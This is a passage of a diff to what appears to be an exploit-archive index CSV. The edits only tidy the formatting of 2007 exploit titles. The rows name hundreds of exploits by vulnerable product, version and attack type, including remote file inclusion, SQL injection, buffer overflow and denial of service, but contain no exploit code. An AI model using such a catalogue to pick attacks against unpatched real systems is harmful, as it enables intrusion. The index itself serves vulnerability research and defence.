Service Exploit (win32)",2007-03-20,mu-b,windows,dos,0 +3527,platforms/windows/dos/3527.pl,"Mercur IMAPD 5.00.14 - Remote Denial of Service Exploit (win32)",2007-03-20,mu-b,windows,dos,0 3528,platforms/php/webapps/3528.pl,"phpRaid < 3.0.7 (rss.php phpraid_dir) Remote File Inclusion Exploit",2007-03-20,"Cold Zero",php,webapps,0 3529,platforms/linux/local/3529.php,"PHP <= 5.2.1 hash_update_file() Freed Resource Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 3530,platforms/php/webapps/3530.pl,"Monster Top List <= 1.4.2 (functions.php root_path) RFI Exploit",2007-03-20,fluffy_bunny,php,webapps,0 @@ -3205,7 +3205,7 @@ id,file,description,date,author,platform,type,port 3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 (BASE) Remote File Inclusion Vulnerabilities",2007-03-22,GoLd_M,php,webapps,0 3543,platforms/php/webapps/3543.pl,"PortailPhp 2.0 (idnews) Remote SQL Injection Exploit",2007-03-22,"Mehmet Ince",php,webapps,0 3544,platforms/windows/remote/3544.c,"Microsoft DNS Server - (Dynamic DNS Updates) Remote Exploit",2007-03-22,"Andres Tarasco",windows,remote,0 -3545,platforms/php/webapps/3545.txt,"LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities",2007-03-22,Kacper,php,webapps,0 +3545,platforms/php/webapps/3545.txt,"Lms <= 1.8.9 Vala Remote File Inclusion Vulnerabilities",2007-03-22,Kacper,php,webapps,0 3546,platforms/asp/webapps/3546.txt,"aspWebCalendar 4.5 (calendar.asp eventid) SQL Injection Vulnerability",2007-03-22,parad0x,asp,webapps,0 3547,platforms/windows/dos/3547.c,"0irc-client 1345 build20060823 - Denial of Service Exploit",2007-03-22,DiGitalX,windows,dos,0 3548,platforms/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 (op) Local File Inclusion Exploit",2007-03-23,GoLd_M,php,webapps,0 @@ -3226,7 +3226,7 @@ id,file,description,date,author,platform,type,port 3564,platforms/php/webapps/3564.pl,"Joomla Component Car Manager <= 1.1 - Remote SQL Injection Exploit",2007-03-24,ajann,php,webapps,0 3565,platforms/php/webapps/3565.pl,"Joomla Component RWCards <= 2.4.3 - Remote SQL Injection Exploit",2007-03-24,ajann,php,webapps,0 3566,platforms/multiple/dos/3566.pl,"Asterisk <= 1.2.16 / 1.4.1 SIP INVITE Remote Denial of Service Exploit",2007-03-25,MADYNES,multiple,dos,0 -3567,platforms/php/webapps/3567.pl,"Mambo Module Flatmenu <= 1.07 Remote File Include Exploit",2007-03-25,"Cold Zero",php,webapps,0 +3567,platforms/php/webapps/3567.pl,"Mambo Module Flatmenu <= 1.07 - Remote File Include Exploit",2007-03-25,"Cold Zero",php,webapps,0 3568,platforms/php/webapps/3568.txt,"Free Image Hosting <= 2.0 (AD_BODY_TEMP) Remote File Inclusion Vulns",2007-03-25,Crackers_Child,php,webapps,0 3569,platforms/php/webapps/3569.pl,"PBlang <= 4.66z Remote Create Admin Exploit",2007-03-25,Hessam-x,php,webapps,0 3570,platforms/windows/remote/3570.c,"WarFTP 1.65 (USER) Remote Buffer Overlow Exploit (multiple targets)",2007-03-25,niXel,windows,remote,21 @@ -3235,11 +3235,11 @@ id,file,description,date,author,platform,type,port 3574,platforms/php/webapps/3574.pl,"PBlang 4.66z Remote Code Execution Exploit",2007-03-25,Hessam-x,php,webapps,0 3575,platforms/windows/remote/3575.cpp,"Frontbase <= 4.2.7 - Remote Buffer Overflow Exploit (windows)",2007-03-25,Heretic2,windows,remote,0 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL phpDOC Local Buffer Overflow Exploit",2007-03-25,rgod,windows,local,0 -3577,platforms/windows/remote/3577.html,"MS Internet Explorer - Recordset Double Free Memory Exploit (MS07-009)",2007-03-26,N/A,windows,remote,0 +3577,platforms/windows/remote/3577.html,"Microsoft Internet Explorer - Recordset Double Free Memory Exploit (MS07-009)",2007-03-26,N/A,windows,remote,0 3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit",2007-03-26,harry,bsd,local,0 3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (Win2K SP4)",2007-03-26,"Winny Thomas",windows,remote,21 -3580,platforms/php/webapps/3580.pl,"IceBB 1.0-rc5 Remote Create Admin Exploit",2007-03-26,Hessam-x,php,webapps,0 -3581,platforms/php/webapps/3581.pl,"IceBB 1.0-rc5 Remote Code Execution Exploit",2007-03-26,Hessam-x,php,webapps,0 +3580,platforms/php/webapps/3580.pl,"IceBB 1.0-rc5 - Remote Create Admin Exploit",2007-03-26,Hessam-x,php,webapps,0 +3581,platforms/php/webapps/3581.pl,"IceBB 1.0-rc5 - Remote Code Execution Exploit",2007-03-26,Hessam-x,php,webapps,0 3582,platforms/php/webapps/3582.pl,"PHP-Nuke Module Addressbook 1.2 - Local File Inclusion Exploit",2007-03-26,bd0rk,php,webapps,0 3583,platforms/php/webapps/3583.txt,"C-Arbre <= 0.6PR7 (root_path) Remote File Inclusion Vulnerability",2007-03-26,K-159,php,webapps,0 3584,platforms/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection Exploit (2)",2007-03-27,bunker,multiple,remote,0 @@ -3247,7 +3247,7 @@ id,file,description,date,author,platform,type,port 3586,platforms/linux/dos/3586.php,"PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC",2007-03-27,"Stefan Esser",linux,dos,0 3587,platforms/linux/local/3587.c,"Linux Kernel <= 2.6.20 with DCCP Support Memory Disclosure Exploit",2007-03-27,"Robert Swiecki",linux,local,0 3588,platforms/php/webapps/3588.pl,"XOOPS module Articles <= 1.02 (print.php id) SQL Injection Exploit",2007-03-27,WiLdBoY,php,webapps,0 -3589,platforms/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)",2007-03-27,skillTube,windows,remote,80 +3589,platforms/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 - Remote Buffer Overflow Exploit (meta)",2007-03-27,skillTube,windows,remote,80 3590,platforms/php/webapps/3590.htm,"Joomla Component D4JeZine <= 2.8 - Remote BLIND SQL Injection Exploit",2007-03-27,ajann,php,webapps,0 3591,platforms/php/webapps/3591.txt,"PHP-Nuke Module Eve-Nuke 0.1 (mysql.php) RFI Vulnerability",2007-03-27,"ThE TiGeR",php,webapps,0 3592,platforms/php/webapps/3592.htm,"Web Content System 2.7.1 - Remote File Inclusion Exploit",2007-03-27,kezzap66345,php,webapps,0 @@ -3344,7 +3344,7 @@ id,file,description,date,author,platform,type,port 3687,platforms/php/webapps/3687.txt,"ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit",2007-04-08,BeyazKurt,php,webapps,0 3688,platforms/windows/local/3688.c,"Microsoft Windows GDI - Local Privilege Escalation Exploit (MS07-017)",2007-04-08,Ivanlef0u,windows,local,0 3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities",2007-04-08,Dj7xpl,php,webapps,0 -3690,platforms/windows/dos/3690.txt,"microsoft office word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0 +3690,platforms/windows/dos/3690.txt,"Microsoft office word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0 3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - Remote SQL Injection Vulnerability",2007-04-09,"h a c k e r _ X",php,webapps,0 3692,platforms/windows/local/3692.c,"IrfanView 3.99 .ANI File Local Buffer Overflow Exploit (multiple targets)",2007-04-09,"Breno Silva Pinto",windows,local,0 3693,platforms/windows/dos/3693.txt,"Microsoft Windows - .HLP File Local HEAP Overflow PoC (0day)",2007-04-09,muts,windows,dos,0 @@ -3364,7 +3364,7 @@ id,file,description,date,author,platform,type,port 3707,platforms/php/webapps/3707.txt,"TOSMO/Mambo 1.4.13a (absolute_path) Remote File Inclusion Vulns",2007-04-11,"Cold Zero",php,webapps,0 3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 - Remote Directory Transversal Exploit",2007-04-11,shinnai,multiple,remote,0 3709,platforms/multiple/dos/3709.html,"Gran Paradiso 3.0a3 non-existent applet Denial of Service Exploit",2007-04-11,shinnai,multiple,dos,0 -3710,platforms/php/webapps/3710.php,"PunBB <= 1.2.14 Remote Code Execution Exploit",2007-04-11,DarkFig,php,webapps,0 +3710,platforms/php/webapps/3710.php,"PunBB <= 1.2.14 - Remote Code Execution Exploit",2007-04-11,DarkFig,php,webapps,0 3711,platforms/php/webapps/3711.htm,"CodeBreak 1.1.2 (codebreak.php) Remote File Inclusion Exploit",2007-04-11,"John Martinelli",php,webapps,0 3712,platforms/php/webapps/3712.txt,"Mambo Module Weather (absolute_path) RFI Vulnerability",2007-04-11,"Cold Zero",php,webapps,0 3713,platforms/php/webapps/3713.txt,"Mambo Module Calendar (Agenda) 1.5.5 RFI Vulnerability",2007-04-11,"Cold Zero",php,webapps,0 @@ -3386,7 +3386,7 @@ id,file,description,date,author,platform,type,port 3730,platforms/linux/local/3730.txt,"ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0 3731,platforms/php/webapps/3731.php,"Frogss CMS <= 0.7 - Remote SQL Injection Exploit",2007-04-13,Kacper,php,webapps,0 3732,platforms/php/webapps/3732.txt,"Garennes 0.6.1 (repertoire_config) Remote File Inclusion Vulnerabilities",2007-04-13,GoLd_M,php,webapps,0 -3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability",2007-04-14,irvian,php,webapps,0 +3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - (class.Smarty.php) Remote File Include Vulnerability",2007-04-14,irvian,php,webapps,0 3734,platforms/php/webapps/3734.txt,"joomla module autostand 1.0 - Remote File Inclusion Vulnerability",2007-04-14,"Cold Zero",php,webapps,0 3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution Vulnerability",2007-04-14,Gammarays,php,webapps,0 3736,platforms/php/webapps/3736.txt,"mambo/joomla component article 1.1 - Remote File Inclusion Vulnerability",2007-04-14,"Cold Zero",php,webapps,0 @@ -3419,7 +3419,7 @@ id,file,description,date,author,platform,type,port 3763,platforms/php/webapps/3763.txt,"Rezervi 0.9 (root) Remote File Inclusion Vulnerabilities",2007-04-18,GoLd_M,php,webapps,0 3764,platforms/php/webapps/3764.txt,"Zomplog 3.8 (force_download.php file) Remote File Disclosure Vuln",2007-04-18,Dj7xpl,php,webapps,0 3765,platforms/php/webapps/3765.txt,"opensurveypilot <= 1.2.1 - Remote File Inclusion Vulnerability",2007-04-18,"Alkomandoz Hacker",php,webapps,0 -3766,platforms/php/webapps/3766.txt,"Mx Module Smartor Album FAP 2.0 RC 1 Remote File Inclusion Vuln",2007-04-19,bd0rk,php,webapps,0 +3766,platforms/php/webapps/3766.txt,"Mx Module Smartor Album FAP 2.0 RC 1 - Remote File Inclusion Vuln",2007-04-19,bd0rk,php,webapps,0 3767,platforms/asp/webapps/3767.txt,"CreaDirectory 1.2 (error.asp id) Remote SQL Injection Vulnerability",2007-04-19,CyberGhost,asp,webapps,0 3768,platforms/windows/dos/3768.pl,"Winamp <= 5.3 (WMV File) Remote Denial of Service Exploit",2007-04-19,WiLdBoY,windows,dos,0 3769,platforms/linux/dos/3769.c,"eXtremail <= 2.1.1 DNS Parsing Bugs Remote Exploit PoC",2007-04-20,mu-b,linux,dos,0 @@ -3441,9 +3441,9 @@ id,file,description,date,author,platform,type,port 3785,platforms/php/webapps/3785.txt,"Post Revolution <= 0.7.0 RC 2 (dir) Remote File Inclusion Vulnerability",2007-04-23,InyeXion,php,webapps,0 3786,platforms/php/webapps/3786.txt,"GPB Bulletin Board Multiple Remote File Inclusion Vulnerabilities",2007-04-24,"ThE TiGeR",php,webapps,0 3787,platforms/linux/remote/3787.c,"GNU Mailutils imap4d 0.6 - Remote Format String Exploit (exec-shield)",2007-04-24,Xpl017Elz,linux,remote,143 -3788,platforms/windows/dos/3788.html,"Second Sight Software ActiveGS.ocx ActiveX Buffer Overflow POC",2007-04-24,"Umesh Wanve",windows,dos,0 -3789,platforms/windows/dos/3789.html,"Second Sight Software ActiveMod.ocx ActiveX Buffer Overflow POC",2007-04-24,"Umesh Wanve",windows,dos,0 -3790,platforms/windows/dos/3790.html,"NetSprint Toolbar ActiveX toolbar.dll Denial of Service POC",2007-04-24,"Umesh Wanve",windows,dos,0 +3788,platforms/windows/dos/3788.html,"Second Sight Software ActiveGS.ocx ActiveX Buffer Overflow PoC",2007-04-24,"Umesh Wanve",windows,dos,0 +3789,platforms/windows/dos/3789.html,"Second Sight Software ActiveMod.ocx ActiveX Buffer Overflow PoC",2007-04-24,"Umesh Wanve",windows,dos,0 +3790,platforms/windows/dos/3790.html,"NetSprint Toolbar ActiveX toolbar.dll Denial of Service PoC",2007-04-24,"Umesh Wanve",windows,dos,0 3791,platforms/hardware/dos/3791.pl,"Linksys SPA941 \377 character Remote Denial of Service Exploit",2007-04-24,MADYNES,hardware,dos,0 3792,platforms/hardware/dos/3792.pl,"Linksys SPA941 (remote reboot) Remote Denial of Service Exploit",2007-04-24,MADYNES,hardware,dos,0 3793,platforms/windows/local/3793.c,"Adobe Photoshop CS2 / CS3 Unspecified .BMP File Buffer Overflow Exploit",2007-04-24,Marsu,windows,local,0 @@ -3468,7 +3468,7 @@ id,file,description,date,author,platform,type,port 3812,platforms/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 .PNG File BoF Exploit",2007-04-27,Marsu,windows,local,0 3813,platforms/php/webapps/3813.txt,"PostNuke pnFlashGames Module 1.5 - Remote SQL Injection Vulnerability",2007-04-28,"Mehmet Ince",php,webapps,0 3814,platforms/php/webapps/3814.txt,"wordpress plugin mygallery <= 1.4b4 - Remote File Inclusion Vulnerability",2007-04-29,GoLd_M,php,webapps,0 -3815,platforms/linux/remote/3815.c,"Fenice OMS server 1.10 Remote Buffer Overflow Exploit (exec-shield)",2007-04-29,Xpl017Elz,linux,remote,0 +3815,platforms/linux/remote/3815.c,"Fenice Oms server 1.10 Remote Buffer Overflow Exploit (exec-shield)",2007-04-29,Xpl017Elz,linux,remote,0 3816,platforms/php/webapps/3816.php,"TCExam <= 4.0.011 (SessionUserLang) Shell Injection Exploit",2007-04-29,rgod,php,webapps,0 3817,platforms/php/webapps/3817.txt,"Imageview 5.3 (fileview.php album) Local File Inclusion Vulnerability",2007-04-29,DNX,php,webapps,0 3818,platforms/php/webapps/3818.htm,"The Merchant <= 2.2.0 (index.php show) Remote File Inclusion Exploit",2007-04-29,kezzap66345,php,webapps,0 @@ -3503,7 +3503,7 @@ id,file,description,date,author,platform,type,port 3847,platforms/php/webapps/3847.txt,"Versado CMS 1.07 (ajax_listado.php urlModulo) RFI Vulnerability",2007-05-04,kezzap66345,php,webapps,0 3848,platforms/php/webapps/3848.txt,"workbench 0.11 (header.php path) Remote File Inclusion Vulnerability",2007-05-04,kezzap66345,php,webapps,0 3849,platforms/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - Remote SQL Injection Vulnerability",2007-05-04,"Mehmet Ince",php,webapps,0 -3850,platforms/php/webapps/3850.php,"RunCms <= 1.5.2 (debug_show.php) Remote SQL Injection Exploit",2007-05-04,rgod,php,webapps,0 +3850,platforms/php/webapps/3850.php,"RunCMS <= 1.5.2 (debug_show.php) Remote SQL Injection Exploit",2007-05-04,rgod,php,webapps,0 3851,platforms/multiple/dos/3851.c,"Multiple vendors ZOO file decompression Infinite Loop DoS PoC",2007-05-04,Jean-Sébastien,multiple,dos,0 3852,platforms/php/webapps/3852.txt,"PMECMS <= 1.0 config[pathMod] Remote File Inclusion Vulnerabilities",2007-05-04,GoLd_M,php,webapps,0 3853,platforms/php/webapps/3853.txt,"Persism CMS <= 0.9.2 system[path] Remote File Inclusion Vulnerabilities",2007-05-04,GoLd_M,php,webapps,0 @@ -3515,7 +3515,7 @@ id,file,description,date,author,platform,type,port 3859,platforms/php/webapps/3859.txt,"Archangel Weblog 0.90.02 Local File Inclusion / Admin Bypass Vulns",2007-05-05,Dj7xpl,php,webapps,0 3860,platforms/php/webapps/3860.txt,"PHPtree 1.3 (cms2.php s_dir) Remote File Inclusion Vulnerability",2007-05-05,"ThE TiGeR",php,webapps,0 3861,platforms/php/webapps/3861.txt,"NoAh <= 0.9 pre 1.2 (mfa_theme.php) Remote File Inclusion Vulnerability",2007-05-06,kezzap66345,php,webapps,0 -3862,platforms/php/webapps/3862.txt,"XOOPS Module wfquotes 1.0 0 Remote SQL Injection Vulnerability",2007-05-06,"Mehmet Ince",php,webapps,0 +3862,platforms/php/webapps/3862.txt,"XOOPS Module wfquotes 1.0 Remote SQL Injection Vulnerability",2007-05-06,"Mehmet Ince",php,webapps,0 3863,platforms/php/webapps/3863.txt,"Wikivi5 (show.php sous_rep) Remote File Inclusion Vulnerability",2007-05-06,GoLd_M,php,webapps,0 3864,platforms/php/webapps/3864.txt,"Friendly <= 1.0d1 (friendly_path) Remote File Inclusion Vulnerabilities",2007-05-06,GoLd_M,php,webapps,0 3865,platforms/php/webapps/3865.txt,"Tropicalm Crowell Resource 4.5.2 (RESPATH) RFI Vulnerabilities",2007-05-07,kezzap66345,php,webapps,0 @@ -3529,7 +3529,7 @@ id,file,description,date,author,platform,type,port 3873,platforms/windows/dos/3873.html,"SmartCode VNC Manager 3.6 (scvncctrl.dll) Denial of Service Exploit",2007-05-08,shinnai,windows,dos,0 3874,platforms/php/webapps/3874.txt,"CGX 20050314 (pathCGX) Remote File Inclusion Vulnerabilities",2007-05-08,GoLd_M,php,webapps,0 3875,platforms/php/webapps/3875.txt,"PHPLojaFacil 0.1.5 (path_local) Remote File Inclusion Vulnerabilities",2007-05-08,GoLd_M,php,webapps,0 -3876,platforms/php/webapps/3876.txt,"GNUEDU 1.3b2 Multiple Remote File Inclusion Vulnerabilities",2007-05-08,GoLd_M,php,webapps,0 +3876,platforms/php/webapps/3876.txt,"GNUEDU 1.3b2 - Multiple Remote File Inclusion Vulnerabilities",2007-05-08,GoLd_M,php,webapps,0 3877,platforms/windows/remote/3877.html,"IncrediMail IMMenuShellExt ActiveX Control Buffer Overflow Exploit",2007-05-08,"Umesh Wanve",windows,remote,0 3878,platforms/php/webapps/3878.txt,"Miplex2 (SmartyFU.class.php) Remote File Inclusion Vulnerability",2007-05-08,"ThE TiGeR",php,webapps,0 3879,platforms/php/webapps/3879.htm,"phpMyPortal 3.0.0 RC3 GLOBALS[CHEMINMODULES] RFI Exploit",2007-05-09,GoLd_M,php,webapps,0 @@ -3544,7 +3544,7 @@ id,file,description,date,author,platform,type,port 3888,platforms/windows/local/3888.c,"Gimp 2.2.14 .RAS File Download/Execute Buffer Overflow Exploit (win32)",2007-05-09,"Kristian Hermansen",windows,local,0 3890,platforms/windows/dos/3890.html,"McAfee VirusScan 10.0.21 ActiveX control Stack Overflow PoC",2007-05-09,callAX,windows,dos,0 3891,platforms/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 RControl.dll Denial of Service Exploit",2007-05-10,shinnai,windows,dos,0 -3892,platforms/windows/remote/3892.html,"MS Internet Explorer <= 7 - Remote Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0 +3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer <= 7 - Remote Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0 3893,platforms/windows/remote/3893.c,"McAfee Security Center IsOldAppInstalled ActiveX BoF Exploit",2007-05-10,Jambalaya,windows,remote,0 3894,platforms/php/webapps/3894.txt,"Original 0.11 config.inc.php x[1] Remote File Inclusion Vulnerability",2007-05-10,GoLd_M,php,webapps,0 3895,platforms/php/webapps/3895.txt,"Thyme Calendar 1.3 - Remote SQL Injection Vulnerability",2007-05-10,warlord,php,webapps,0 @@ -3610,7 +3610,7 @@ id,file,description,date,author,platform,type,port 3956,platforms/php/webapps/3956.php,"AlstraSoft E-Friends <= 4.21 Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 3957,platforms/php/webapps/3957.php,"AlstraSoft Live Support 1.21 - Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 3958,platforms/php/webapps/3958.php,"AlstraSoft Template Seller Pro <= 3.25 Admin Password Change Exploit",2007-05-20,BlackHawk,php,webapps,0 -3959,platforms/php/webapps/3959.php,"AlstraSoft Template Seller Pro <= 3.25 Remote Code Execution Exploit",2007-05-20,BlackHawk,php,webapps,0 +3959,platforms/php/webapps/3959.php,"AlstraSoft Template Seller Pro <= 3.25 - Remote Code Execution Exploit",2007-05-20,BlackHawk,php,webapps,0 3960,platforms/php/webapps/3960.php,"Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit",2007-05-21,waraxe,php,webapps,0 3961,platforms/windows/remote/3961.html,"LeadTools Raster Variant (LTRVR14e.dll) Remote File Overwrite Exploit",2007-05-21,shinnai,windows,remote,0 3962,platforms/php/webapps/3962.txt,"Ol Bookmarks Manager 0.7.4 (root) Remote File Inclusion Vulnerabilities",2007-05-21,"ThE TiGeR",php,webapps,0 @@ -3624,11 +3624,11 @@ id,file,description,date,author,platform,type,port 3970,platforms/php/webapps/3970.txt,"BtiTracker <= 1.4.1 (become admin) Remote SQL Injection Vulnerability",2007-05-22,m@ge|ozz,php,webapps,0 3971,platforms/php/webapps/3971.php,"NavBoard 2.6.0 - Remote Code Execution Exploit",2007-05-23,Dj7xpl,php,webapps,0 3972,platforms/php/webapps/3972.txt,"Scallywag (template.php path) Remote File Inclusion Vulnerabilities",2007-05-23,"Mehmet Ince",php,webapps,0 -3973,platforms/windows/dos/3973.html,"Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote DoS Exploit",2007-05-23,shinnai,windows,dos,0 +3973,platforms/windows/dos/3973.html,"Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote DoS Exploit",2007-05-23,shinnai,windows,dos,0 3974,platforms/php/webapps/3974.pl,"Dokeos <= 1.8.0 (my_progress.php course) Remote SQL Injection Exploit",2007-05-23,Silentz,php,webapps,0 3975,platforms/windows/local/3975.c,"MagicISO <= 5.4 (build239) .cue File Local Buffer Overflow Exploit",2007-05-23,vade79,windows,local,0 -3976,platforms/windows/dos/3976.pl,"Microsoft Visual Basic 6.0 Project (Company Name) Stack overflow PoC",2007-05-23,UmZ,windows,dos,0 -3977,platforms/windows/dos/3977.pl,"Microsoft Visual Basic 6.0 Project (Description) Stack overflow PoC",2007-05-23,UmZ,windows,dos,0 +3976,platforms/windows/dos/3976.pl,"Microsoft Visual Basic 6.0 Project (Company Name) Stack Overflow PoC",2007-05-23,UmZ,windows,dos,0 +3977,platforms/windows/dos/3977.pl,"Microsoft Visual Basic 6.0 Project (Description) Stack Overflow PoC",2007-05-23,UmZ,windows,dos,0 3978,platforms/windows/dos/3978.pl,"UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow PoC",2007-05-24,n00b,windows,dos,0 3979,platforms/windows/dos/3979.html,"LeadTools Raster Dialog File Object Activex Remote Buffer Overflow PoC",2007-05-24,shinnai,windows,dos,0 3980,platforms/php/webapps/3980.pl,"Dokeos <= 1.6.5 (courseLog.php scormcontopen) SQL Injection Exploit",2007-05-24,Silentz,php,webapps,0 @@ -3665,7 +3665,7 @@ id,file,description,date,author,platform,type,port 4011,platforms/windows/dos/4011.html,"LeadTools Raster ISIS Object (LTRIS14e.DLL 14.5.0.44) - Remote BoF",2007-05-30,shinnai,windows,dos,0 4012,platforms/windows/dos/4012.html,"LeadTools Raster OCR Document Object Library Memory Corruption Exploit",2007-05-30,shinnai,windows,dos,0 4013,platforms/osx/local/4013.txt,"Mac OS X < 2007-005 - (vpnd) Local Privilege Escalation Exploit",2007-05-30,"Kevin Finisterre",osx,local,0 -4014,platforms/windows/remote/4014.py,"Eudora 7.1.0.9 (IMAP FLAGS) Remote SEH Overwrite Exploit 0day",2007-05-30,h07,windows,remote,0 +4014,platforms/windows/remote/4014.py,"Eudora 7.1.0.9 - (IMAP FLAGS) Remote SEH Overwrite Exploit (0day)",2007-05-30,h07,windows,remote,0 4015,platforms/windows/remote/4015.html,"Vivotek Motion Jpeg Control (MjpegDecoder.dll 2.0.0.13) Remote Exploit",2007-05-31,rgod,windows,remote,0 4016,platforms/windows/remote/4016.sh,"Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit",2007-05-31,Sha0,windows,remote,0 4017,platforms/windows/dos/4017.cpp,"Acoustica MP3 CD Burner 4.32 Local Buffer Overflow PoC",2007-05-31,n00b,windows,dos,0 @@ -3683,7 +3683,7 @@ id,file,description,date,author,platform,type,port 4030,platforms/php/webapps/4030.php,"EQdkp <= 1.3.2 (listmembers.php rank) Remote SQL Injection Exploit",2007-06-04,Silentz,php,webapps,0 4031,platforms/php/webapps/4031.txt,"Madirish Webmail 2.0 (addressbook.php) Remote File Inclusion Vuln",2007-06-04,BoZKuRTSeRDaR,php,webapps,0 4032,platforms/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration Exploit",2007-06-04,bunker,tru64,remote,0 -4033,platforms/windows/dos/4033.rb,"SNMPc <= 7.0.18 Remote Denial of Service Exploit (meta)",2007-06-04,"En Douli",windows,dos,0 +4033,platforms/windows/dos/4033.rb,"SNMPc <= 7.0.18 - Remote Denial of Service Exploit (meta)",2007-06-04,"En Douli",windows,dos,0 4034,platforms/php/webapps/4034.txt,"Kravchuk letter script 1.0 (scdir) Remote File Inclusion Vulnerabilities",2007-06-05,"Mehmet Ince",php,webapps,0 4035,platforms/php/webapps/4035.txt,"Comicsense 0.2 (index.php epi) Remote SQL Injection Vulnerability",2007-06-05,s0cratex,php,webapps,0 4036,platforms/php/webapps/4036.php,"PBLang <= 4.67.16.a Remote Code Execution Exploit",2007-06-06,Silentz,php,webapps,0 @@ -3691,12 +3691,12 @@ id,file,description,date,author,platform,type,port 4038,platforms/multiple/dos/4038.pl,"DRDoS - Distributed Reflection Denial of Service",2007-06-06,whoppix,multiple,dos,0 4039,platforms/php/webapps/4039.txt,"Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit",2007-06-06,Slappter,php,webapps,0 4040,platforms/asp/webapps/4040.txt,"Kartli Alisveris Sistemi 1.0 - Remote SQL Injection Vulnerability",2007-06-06,kerem125,asp,webapps,0 -4041,platforms/php/webapps/4041.htm,"NewsSync for phpBB 1.5.0rc6 Remote File Inclusion Exploit",2007-06-07,GoLd_M,php,webapps,0 +4041,platforms/php/webapps/4041.htm,"NewsSync for phpBB 1.5.0rc6 - Remote File Inclusion Exploit",2007-06-07,GoLd_M,php,webapps,0 4042,platforms/windows/remote/4042.html,"Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit",2007-06-07,Excepti0n,windows,remote,0 4043,platforms/windows/remote/4043.html,"Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit 2",2007-06-07,Excepti0n,windows,remote,0 4044,platforms/windows/dos/4044.txt,"Microsoft Windows GDI+ - ICO File Remote Denial of Service Exploit",2007-06-07,Kad,windows,dos,0 4045,platforms/windows/remote/4045.py,"Microsoft Windows Animated Cursor Stack Overflow Exploit",2007-06-07,"RISE Security",windows,remote,0 -4046,platforms/windows/dos/4046.pl,"MiniWeb Http Server 0.8.x Remote Denial of Service Exploit",2007-06-07,gbr,windows,dos,0 +4046,platforms/windows/dos/4046.pl,"MiniWeb Http Server 0.8.x - Remote Denial of Service Exploit",2007-06-07,gbr,windows,dos,0 4047,platforms/windows/dos/4047.c,"SafeNET High Assurance Remote 1.4.0 (IPSecDrv.sys) Remote DoS",2007-06-08,mu-b,windows,dos,0 4049,platforms/windows/remote/4049.html,"Zenturi ProgramChecker ActiveX Multiple Insecure Methods Exploit",2007-06-08,shinnai,windows,remote,0 4050,platforms/windows/remote/4050.html,"Zenturi ProgramChecker ActiveX NavigateUrl() Insecure Method Exploit",2007-06-08,shinnai,windows,remote,0 @@ -3732,7 +3732,7 @@ id,file,description,date,author,platform,type,port 4082,platforms/php/webapps/4082.pl,"LiveCMS <= 3.4 (categoria.php cid) Remote SQL Injection Exploit",2007-06-20,g00ns,php,webapps,0 4083,platforms/asp/webapps/4083.txt,"W1L3D4 WEBmarket 0.1 - Remote SQL Injection Vulnerability",2007-06-20,Crackers_Child,asp,webapps,0 4084,platforms/php/webapps/4084.txt,"xoops module wiwimod 0.4 - Remote File Inclusion Vulnerability",2007-06-20,GoLd_M,php,webapps,0 -4085,platforms/php/webapps/4085.txt,"Musoo 0.21 Remote File Inclusion Vulnerabilities",2007-06-20,GoLd_M,php,webapps,0 +4085,platforms/php/webapps/4085.txt,"Musoo 0.21 - Remote File Inclusion Vulnerabilities",2007-06-20,GoLd_M,php,webapps,0 4086,platforms/php/webapps/4086.pl,"LAN Management System (LMS) <= 1.9.6 - Remote File Inclusion Exploit",2007-06-20,Kw3[R]Ln,php,webapps,0 4087,platforms/linux/remote/4087.c,"BitchX 1.1-final (EXEC) Remote Command Execution Exploit",2007-06-21,clarity_,linux,remote,0 4089,platforms/php/webapps/4089.pl,"SerWeb 0.9.4 (load_lang.php) Remote File Inclusion Exploit",2007-06-21,Kw3[R]Ln,php,webapps,0 @@ -3777,7 +3777,7 @@ id,file,description,date,author,platform,type,port 4129,platforms/php/webapps/4129.txt,"Ripe Website Manager (CMS) <= 0.8.9 - Remote File Inclusion Vulns",2007-06-30,BlackNDoor,php,webapps,0 